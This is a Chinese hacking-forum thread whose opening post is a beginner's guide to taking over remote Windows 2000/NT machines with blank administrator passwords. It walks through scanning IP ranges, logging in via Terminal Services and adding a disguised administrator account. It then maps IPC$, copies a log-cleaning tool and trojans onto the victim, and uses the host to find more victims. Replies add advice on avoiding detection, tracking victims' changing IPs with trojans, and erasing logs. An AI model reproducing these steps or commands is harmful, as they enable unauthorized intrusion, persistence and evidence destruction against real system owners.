|
 | 作者: vj110 [vj110]
 论坛用户 |
登录 |
| 建立你的3389肉鸡(菜鸟篇)
www.sandflee.net 2001-12-6 灰色轨迹 (沙子亡原创,转载请注明出处 9.10) 现在有输入法漏洞的机器已不多了,除非你遇见的是一个极不负责任的网管,呵呵!~这篇教程就是教你不用输入法漏洞就能用终端服务连接上开3389的机器,使它成为你的肉鸡。(下面的人要注意啊,不要搞国内的机器,我用来做示范的是台湾的机器,为何要用台湾的呢?等一下就知道啦)先做一下准备活动,呵呵!何为准备活动?就是找到要用的工具呀。(操作系统要求win2000/NT) 一.X-scan-v1.0,强大的扫描工具,简单易用,没有IP限制,呵呵?想到什么了? 二.WIN2000终端服务客户端(没这个怎么叫3389肉鸡呢?) 三.CleanIISLog.exe,榕哥的清日志的好东东!^o^(又买广告呢) 四.SQLEXEC.EXE (以上软件均在本站有下载http://www.sandflee.net) 好!武器都准备好了就动手吧! 一。运行X-scan-v1.0工具包中的xscan_gui.exe,这是一个图形界面的扫描器,在“扫描设置”下选择“标准端口”;“NT弱口令用户”;“SQL-SERVER默认帐户”这三项,“运行参数”下填上你要扫描的IP地址段,例如:211.**.1.1-211.**.20.255(选的范围不要太大,要不很长时间都扫不完,也不要太少,少了可能找不到肉鸡),尽量不要选下面的“使用代理服务器”,线程要看你的网速如何,快的可以填50线程,我一般是用50的!YEAH!~~在“扫描前先PING主机”打上钩,“X-SCANNER所在位置”用默认的.\xscan.exe就可以了。再来“其他设置”下,“配置文件”处是.\dat\config.ini,点击旁边的“读取设置”,看到这个面板的框框都有东西了,就表示设置好!回到开始时的“扫描设置”面板下,点击下方的“开始扫描”。见到一个DOS窗口出来了,扫描正式开始!^O^,去泡泡MM吧,天南地北的吹一通,呵呵,看到扫描全部完成了,和你的MM说拜拜咯,开工~!! 看看扫描的报告,可能会很多的,一定要看清楚哦,要不肉鸡可能就这样给飞走啦。找找看,(主要是找有NT弱口令帐户又同时开了3389的机器)我就找到了一个例子:(不是真的哦,别照这个去试) 211.**.**.53: 【详细资料】 【主机摘要 -- 域名/主机名:"快辣侥" 操作系统:"Windows NT 5.0"】 NT弱口令帐户:1 开放端口:135,139,3389 看到了吗?NT弱口令帐户:1 开放端口:135,139,3389,!!!!!!!!!! 好了,再点“详细资料”进去看看: 【NT弱口令用户】: Administrator: [空口令] 帐户类型:管理员(Administrator) 最后登录时间: GMT 错误口令次数: 0次 成功登录次数: 9次 用户ID: 0x000001f4, 组ID: 0x00000201 欢呼吧,!!!!!!!(如果看到“详细资料”里的帐户类型不是管理员的话,就找下一个吧,反正扫描报告多得很,总会找到一个的,我就试过扫描一次,就扫到了十多个这样的帐户,呵呵!~~) 知道了管理员的帐户是:Administrator,口令是空!到这时候,这台NT主机已差不多可以说是你的啦。 二.运行你的终端服务客户端,填上这个IP,按“连接”,等一下就看到了熟悉的WIN2000终端登陆界面,好,填上用户名:Administrator,口令不用填啦,按“确定”,等一下,哈哈!!!!!进去啦~~~~你会先看到一个叫你设定伺服器的画面,关掉,不要了。想干什么?首先我们为了防止管理员以后改了密码,我们先要给自己做一个管理员的帐户,点对方屏幕的开始--》程序--》附件--》命令提示符(这里的字有时是不同的,要看具体是什么系统,自己好好看看吧),依次输入: C:\>net user owem lgg1234 /add(加入一个用户名为owem,密码:lgg1314的帐户) 指令�绦谐晒Α� C:\>net localgroup administrators owem /add(把owem加入到管理员组) 指令�绦谐晒Α� 好了!到这里你已增加了一个管理员了,以后就算他把Administrator的密码改了你也可以用owem这个帐户进去耍啦,建议你先用net user看看人家的管理组有多少人,人多的话就尽管加个号吧,人少的加号时就要找一个近似于对方的名字来迷惑管理员,哈哈~`够绝了吧! 再来,在自己的命令提示符下依次输入: D:\hacker>net use \\211.**.**.53\ipc$ "lgg1314" /user:"owem"(用IPC管道连接上去) 命令成功完成。 D:\hacker>copy CleanIISLog.exe \\211.**.**.53\c$(把CleanIISLog.exe拷到对方对方C盘下,有时会拒绝访问的,就拷到其他目录下吧) 已复制 1 个文件。 你也可以把木马拷上去,哈哈!~~~有意思!!5555555555..... 再来删除IPC的连接 D:\hacker>net use \\211.**.**.53\ipc$ /delete \\211.**.**.53\ipc$ 已经删除。 先去看看管理员在不在,开始--》程序--》系统管理工具--》终端服务管理员,哈哈!`~没在!爽极啦,只有你一个连线! 下面该玩点什么呢?打开他的浏览器,去你知道的黑软地址下载你想用的工具,什么?装个流光?哈哈!~~`目标太大了吧?还是下个X-SCAN算了,下个IP炸弹??呵呵!好主意,`炸你的情敌去吧!用他下载的X-SCAN帮你去找更多的肉鸡!1YEAH!如果你在上面运行了程序,你退出时就只关终端窗口右上角的X就行了,关掉后你的程序还在运行呢!明天睡醒了来收你的战果吧!如果你要全部退出,就按开始--》关机--》登出****(你的帐户)。 还要补充的就是如果你扫到的是:SQL-SERVER默认帐户,没有NT管理员弱口令,但3389还是开了的话,就可以用SQLEXEC。EXE来连接上去,建立帐户也是用一样的命令,你也可以用3389登陆上去啦。 好!下课!!GOOD LOCK! |
| 地主 发表时间: 06/11 23:13 |
| 回复: vj110 [vj110] 论坛用户 |
登录 |
|
这么好 没人看啊? |
| B1层 发表时间: 06/12 14:44 |
 | 回复: snandy [snandy]  论坛用户 |
登录 |
|
小黑子,我想问一下,用客户端连接3389肉鸡时,如是administrator在的话,那他是不是可以看到我在肉鸡上所做的一切啊???? 55555555555~~~~~~~~~~~~~~ 我常在肉鸡上下载流光安装上去啊,那岂不是完了!!!!!!!!! 还有肉鸡如果是变动IP的,我以后怎样得到他的ip,我用过很多木马都不行啊!!! 灰鸽子可以发信,但那个IP却不准的!!! [此贴被 林枫(snandy) 在 6月12日15时12分 编辑过] |
| B2层 发表时间: 6/12 15:56 |
| 回复: vj110 [vj110] 论坛用户 |
登录 |
|
什么啊? 你用加一个你自己的用户啊 怕的话啊 就是晚上搞,,嘿嘿 我都是搞国外的 |
| B3层 发表时间: 06/12 17:29 |
 | 回复: vishx [vishx]  论坛用户 |
登录 |
|
aha!我的是98怎办??? |
| B4层 发表时间: 06/12 17:32 |
| 回复: vj110 [vj110] 论坛用户 |
登录 |
|
还有肉鸡如果是变动IP的,我以后怎样得到他的ip,我用过很多木马都不行啊!!! 灰鸽子可以发信,但那个IP却不准的!!! 如果是这样的话,,,,要么他不是宽代 不是宽代要来错屁啊,,无用,,我才不玩呢,,不好玩,,慢慢的 是宽代的话我想是静态IP对的多啊 如果是宽代又是动态IP,,,,要不你就用你的木马 不要啊,,,,,,,,,,,就不要这个肉鸡了,,, 拷,,我才没时间接信看他IP呢 网上肉鸡多的是! |
| B5层 发表时间: 06/12 17:32 |
 | 回复: SANKKING [sankking]  论坛用户 |
登录 |
|
一般而言,如果他是用拨号上网的话,虽然ip不固定,但是前三位基本没变,说你只要再扫描一下整个ip段就可以了。 |
| B6层 发表时间: 06/12 19:44 |
| 回复: vj110 [vj110] 论坛用户 |
登录 |
|
就这样了, 说的不好,,不要见笑 |
| B7层 发表时间: 06/12 22:55 |
| 回复: vj110 [vj110] 论坛用户 |
登录 |
|
写的这样好,,,大家都不看啊 先说啊 看了我这个,,,, 一定要发表下 不发表我生气哦,,OK? |
| B8层 发表时间: 06/13 23:37 |
| 回复: snandy [snandy] 论坛用户 |
登录 |
|
是ADSL,我不知道是不是宽带,我觉得也很快啊! |
| B9层 发表时间: 06/14 01:08 |
 | 回复: tmxk [tmxk]  论坛用户 |
登录 |
|
cleaniislog 能清除非iis的log吗? |
| B10层 发表时间: 06/14 08:45 |
 | 回复: hl82 [hl82] 论坛用户 |
登录 |
|
是的 不过你 要有超级用户的权限!!! |
| B11层 发表时间: 06/14 10:33 |
| 回复: vj110 [vj110] 论坛用户 |
登录 |
|
一般而言,如果他是用拨号上网的话,虽然ip不固定,但是前三位基本没变,说你只要再扫描一下整个ip段就可以了。 这位人兄说的 我不知道 是真的吗?? 如果是这样的话,,, 那也不错哦,, 呵呵,,,又学到一招 大家交流! |
| B12层 发表时间: 06/14 12:18 |
| 回复: snandy [snandy] 论坛用户 |
登录 |
|
谢谢 SANKKING |
| B13层 发表时间: 06/15 01:16 |
| 回复: vj110 [vj110] 论坛用户 |
登录 |
|
不用谢,, 大家多多交流啊 呵呵  |
| B14层 发表时间: 06/15 10:57 |
 | 回复: playopy [playopy] 论坛用户 |
登录 |
|
98可以吗? |
| B15层 发表时间: 03/13 16:04 |
 | 回复: woodcutter [woodcutter] 论坛用户 |
登录 |
|
加上mmc远程控制就更好了 |
| B16层 发表时间: 03/13 16:15 |
| 回复: woodcutter [woodcutter] 论坛用户 |
登录 |
|
加上mmc远程控制就更好了 |
| B17层 发表时间: 03/13 16:16 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 菜鸟乐园 标题: 建立你的3389肉鸡(菜鸟篇)文章不错,给大家看下,学习学习!